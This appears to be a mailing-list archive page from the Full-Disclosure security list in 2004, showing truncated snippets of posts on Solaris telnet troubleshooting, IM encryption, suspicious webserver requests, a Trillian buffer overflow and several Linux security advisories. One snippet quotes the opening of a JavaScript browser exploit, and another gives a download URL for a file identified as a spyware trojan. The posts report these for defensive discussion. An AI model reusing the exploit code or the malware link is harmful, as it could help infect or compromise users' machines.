-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Über GuidoZ wrote:
| I can't point you towards any white papers unfortunately, however I
| CAN point you towards an application that I have found most useful for
| securing IM conversations.
|
| http://www.secway.fr/products/simplite_msn/home.php
How
How about using Gaim :) gaim.sf.net
It uses RSA encryption through gaim-encryption plugin and it is free.
Can be used on most of the IM networks today.
Yeah. It's also bug-ridden as hell.
___
Full-Disclosure - We believe in it.
Charter:
I just got attached e-mail. On the linked website I found this exploit
code (sorry for the line breaks):
script
function govuln(){
var w=window.open(javascript:setInterval(function(){try{var
tempvar=opener.location.href;}catch(e){location.assign('javascript:var
xmlHTTP = new
HI list,
I have some strange problem or may be its starnge to
me
I have closed the Telnet port in Solaris 8 server by
hashing inetd but still its listening at port 23,even
after giving HUP to inetd.
I can do telnet from other machines to this server,
its getting connected but not showing login
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Tuesday, 07.09.2004 at 03:43 -0700, ismail syed wrote:
HI list,
I have some strange problem or may be its starnge to
me
I have closed the Telnet port in Solaris 8 server by
hashing inetd but still its listening at port 23,even
after giving
Hello all,
I just wanted to check, if somebody can tell me something (possibly
security related ;-) about some funny request signatures, as I have
found them in my webserver logs. They look similar to:
GET
Martin Stricker wrote:
I just got attached e-mail. On the linked website I found this exploit
code (sorry for the line breaks):
As far as I can figure out it is a combination of two unpatched
vulnerabilities. First it uses method assignement vulnerability
(discovered by Paul (at) greyhats cjb
On Tuesday 07 September 2004 12:43, ismail syed wrote:
HI list,
I have some strange problem or may be its starnge to
me
I have closed the Telnet port in Solaris 8 server by
hashing inetd but still its listening at port 23,even
after giving HUP to inetd.
I can do telnet from other machines
ismail syed wrote:
HI list,
I have some strange problem or may be its starnge to
me
I have closed the Telnet port in Solaris 8 server by
hashing inetd but still its listening at port 23,even
after giving HUP to inetd.
I can do telnet from other machines to this server,
its getting connected but
Does a ps -ef | grep telnet you any telnetd* ?
Any _listening_ sockets in netstat -a | grep telnet?
On Dienstag 07 September 2004 12:43, ismail syed wrote:
I have closed the Telnet port in Solaris 8 server by
hashing inetd but still its listening at port 23,even
after giving HUP to inetd.
I
Hello,
I have closed the Telnet port in Solaris 8 server by
hashing inetd but still its listening at port 23,even
after giving HUP to inetd.
Download and run lsof
http://www.sunfreeware.com/programlistsparc8.html
lsof will show you the process attached to telnet port.
Regards,
--
ismail syed wrote:
HI list,
I have some strange problem or may be its starnge to
me
I have closed the Telnet port in Solaris 8 server by
hashing inetd but still its listening at port 23,even
after giving HUP to inetd.
did you remember to comment out BOTH the tcp4 and tcp6 entries in inetd?
Well, from a quick glance I can tell you that %20 is ascii for space
( ) and %06 is ascii for a forward slash (/). I also see %17, which
is ascii for ETB (End of Transmission block), however I'm not sure if
that's what was supposed to be there. So, replacing the first two
leaves you with this:
Hello,
http://real.slon.biz/server.exe
file is
TrojanSpy.Win32.Small.AZ (AVP)
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Alla Bezroutchko wrote:
Also interesting that they don't use
a {behavior:url(#default#AnchorClick);}
in this exploit which seems to be an essential part of http-equiv's and
mikx's exploits.
The key to all this exploits is drag'n'drop access to a local directory.
Since WinXP SP2 it's not possible
If you have the lsof package (and if you don't I strongly recommend
it), do a lsof | grep LISTEN | grep telnet. That should give you
the process that has the port open.
On Tue, 7 Sep 2004 03:43:44 -0700 (PDT), ismail syed
[EMAIL PROTECTED] wrote:
HI list,
I have some strange problem or may
Hi,
I wrote a short paper/article on the warez scene for 2600 magazine
(www.2600.com)
It contains some valuable information about who is hacking you and
why, thought this may interest some of you (especiall the many i've
seen on here who have found an unknown FTP server on their computer).
A scan
PRODUCT
Trillian is a chat client currently supporting IRC, AIM, ICQ, MSN
Messenger, and Yahoo! Messenger. (from readme.txt file)
DETAILS
A buffer overflow vulnerability in basic edition version 0.74i (latest
version) occours in the MSN module when receiving a string of around
4096 bytes ended
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200409-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: imlib2
Advisory ID:
Feher Tamas wrote:
... server.exe
file is
TrojanSpy.Win32.Small.AZ (AVP)
Perhaps at the the time or shortly before you posted this close to 12
hours after the OP wrote his message, but when he wrote AVP/KAV did not
detect it at all. In fact, it was the only one of what I consider the
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: zlib
Advisory ID:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: cdrecord
Advisory ID:
23 matches
Mail list logo